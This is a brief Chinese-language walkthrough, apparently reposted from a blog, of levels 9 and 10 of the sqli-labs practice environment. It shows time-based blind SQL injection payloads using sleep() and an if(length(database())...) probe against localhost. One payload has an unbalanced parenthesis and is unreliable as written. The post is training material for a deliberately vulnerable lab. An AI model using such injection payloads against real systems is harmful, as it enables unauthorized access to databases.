zoukankan      html  css  js  c++  java

  • sqli-labs(9-10关)

    第九关(Less-9):

      1.根据提示输入127.0.0.1/sqli-labs-master/Less-9/?id=1,回显正常

      2.对sql注入漏洞进行判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1'回显正常

      3.使用sleep函数进行sql注入漏洞判断,输入127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) --+,经过5s回显正常,说明存在注入漏洞

      4.通过Less-8中的时间盲注进行数据库长度的猜解,输入127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(length(database))=8,1,sleep(5)) --+,如果数据库长度为8,则返回较快。通过实验可知,返回较快,故当前数据库的长度为8

      5.其余与Less-8中的猜解一样。

    第十关(Less-10):

      127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(11)--+,Less-10只是将Less-9中的单引号变成双引号,其余的均相同。

      

      
  • 相关阅读:
    leetcode167 Two Sum II
    leetcode18 4Sum
    leetcode15 three sum
    leetcode-1-Two Sum
    SQL优化——select
    Hadoop 集群搭建
    虚拟机中的两台主机怎么相互拷贝文件
    doker5
    docker4
    docker3
  • 原文地址:https://www.cnblogs.com/mxm0117/p/12273716.html
Copyright © 2011-2022 走看看